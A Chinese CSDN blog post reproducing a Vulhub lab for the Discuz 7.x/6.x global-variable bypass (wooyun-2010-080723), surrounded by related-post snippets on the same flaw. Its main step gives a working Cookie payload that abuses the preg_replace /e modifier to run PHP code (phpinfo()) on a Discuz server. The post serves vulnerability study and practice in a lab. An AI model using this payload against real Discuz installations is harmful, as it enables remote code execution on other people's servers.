Vulhub--wooyun-2010-080723

最新推荐文章于 2024-07-09 11:22:52 发布
最新推荐文章于 2024-07-09 11:22:52 发布
阅读量150 收藏
点赞数
分类专栏: Vulhub 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/firecjh/article/details/131132207
版权

复现vulhub上的Discuz 7.x/6.x 全局变量防御绕过导致代码执行。

  1. 启动环境

2. 访问http://your-ip:8080/install/来安装discuz

3.安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

像雾若雨又如风
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Vulnhub复现漏洞 - Discuz 7.x/6.x 全局变量防御绕过导致代码执行
JiangBuLiu的博客
06-28 889
Discuz 7.x/6.x 全局变量防御绕过导致代码执行Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过...
buuctf [Discuz]wooyun-2010-080723
qq_1873822的博客
03-23 1530
漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 https://www.secpulse.com/archives/2338.html https://www.freebuf.com/articles/web/226207.html 漏洞复现 http://node3.buuoj.cn:28226/install/来安装di
discuz wooyun-2010-080723
weixin_37639863的博客
02-17 1822
漏洞复现-Discuz-命令执行(wooyun-2010-080723) - 铺哩 - 博客园0x00 实验环境 攻击机:win10 靶机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 Discuz 7.x 6.x版本 0x02 实验目的 学习discuz的部分https://www.cnblogs.com/cute-puli/p/13333991.htmlbuuctf [Discuz]wooyun-2010-080723_Fatesec的博客-CSDN博客漏洞描述由于php
Vulhub靶场Discuz-命令执行(wooyun-2010-080723)漏洞复现
X_python321的博客
05-16 307
Discuz-命令执行(wooyun-2010-080723)漏洞复现
vulhub】Discuz-命令执行 wooyun-2010-080723
weixin_42884199的博客
12-06 1716
一、启动靶机 docker-compose build docker-compose up -d 二、安装 URL: http://192.168.150.146:8080/install 安装数据库数据库服务器填写db(必须db,不然安装失败),数据库名为discuz,数据库账号密码均为root,管理员密码任意。填写联系方式页面直接点击跳过本步后跳转到首页,登录成功后进入默认板块,开启Burp抓包,然后随便点击一篇贴子 将Cookie修改为下面,点击放包 三、构造payload 请求: GET
Vulhub漏洞靶场搭建
qq_53058639的博客
03-13 1159
是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。物理机:Windows 10虚拟机:Centos 7,网卡设置为NAT模式。
wooyun_public-master.zip
08-23
标题中的"wooyun_public-master.zip"表明这是一个与Wooyun相关的开源项目,而Wooyun,也称为“乌云”,曾是中国知名的网络安全社区。这个压缩包可能是该社区公开的一部分资源或者研究资料,以"master"命名,通常代表...
py爬虫wooyun-public-master
04-20
py爬虫wooyun_public-master提取方式是百度网盘分享地址
wooyun-public-master-python.rar
01-23
wooyun_public-master-python.rar Python爬虫入门需要掌握Python基础语法、网络请求和数据抓取、解析HTML和XML、处理HTTP响应、数据存储、使用代理和反爬策略、并发和多线程等技术,并遵守相关法律和道德规范。
Discuz 7.x6.x 全局变量防御绕过导致代码执行(wooyun-2010-080723
黑白的博客
12-06 525
声明 好好学习,天天向上 漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 影响范围 6.x 7.x 复现过程 使用vulhub 这里使用7.2版本 cd /app/vulhub-master/discuz/wooyun-2010-080723 启动 docker-compose
某运营商广告投放系统SQL注射漏洞 | WooYun-2012-06396 | WooYun.org
05-03 153
某运营商广告投放系统SQL注射漏洞 | WooYun-2012-06396 | WooYun.org 某运营商广告投放系统SQL注射漏洞 | WooYun-2012-06396 | WooYun.org 漏洞概要 关注数(13) 关注此漏洞 缺陷编...
vulhub漏洞复现八_discuz
weixin_44193247的博客
01-09 1327
vulhub漏洞复现练习篇
搭建Vulhub漏洞靶场
qq_43936524的博客
02-16 952
文章目录环境安装安装Docker安装Docker-Compose安装VulhubDocker加速Vulhub使用 环境安装 安装Docker sudo apt install docker.io 或者 curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun(比较快) 输入docker显示下面的页面则安装完成: 安装Docker-Compose 在Docker-Compose下载最新版本的docker-compose-Linux
流式数据库 RisingWave「Demo」:直播指标实时分析
https://risingwave.com/
07-04 805
直播是目前最为流行的娱乐形式之一,本教程将分享如何使用开源流式数据库 RisingWave 监控直播指标。我们为本教程设置了一个演示集群,以便大家可以轻松尝试。
JDBC (基础)
weixin_51644244的博客
07-07 334
思考: java和sql是两种不同的编程语言。翻译程序---每个数据库厂商都提高了翻译软件-- -打包jar。---我们的java代码引入jar就可完成与数据库的沟通。Java :OOP 面向对象的编程对象。SQL: 结构化查询语言。
数据库原理之并发控制的基本概念
m0_75262255的博客
07-06 1099
并发控制的简单介绍。
短链接学习day2
weixin_63374588的博客
07-05 871
需要注意的是,转换过程中,BeanUtil.toBean()方法通过反射机制创建了目标类型的实例,并将数据源对象的属性值复制到目标对象中。但是为了防止redis的主节点挂掉后,从节点变成主节点时,有些数据还没复制,就会导致脏数据,就会可能导致用户名重复,所以为了防止这个情况,我们需要将username设置为唯一索引,让数据库兜底。因为用户名不是特别重要的数据,如果说我设置用户名为 aaa,系统返回我不可用,那我大可以在 aaa 的基础上再加一个a,也就是 aaaa。一定要记得写枚举的时候是用逗号分割。
系统架构设计师教程 第二章 计算机系统基础知识-2.3计算机软件
最新发布
Remon的专栏
07-09 529
《系统架构设计师教程》清华第二版 2.3计算机软件 章节的详细解读
Python创建MySQL数据库
limengshi138392的博客
07-05 366
Python创建MySQL数据库
wooyun-2010-09336
01-14
wooyun-2010-09336是2010年发生的一起网络安全漏洞事件。这个漏洞是由于某个网站的后台管理系统存在缺陷,使得攻击者可以绕过身份验证,远程执行恶意代码,从而获取系统的控制权。 当时,一位白帽黑客通过对该网站...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值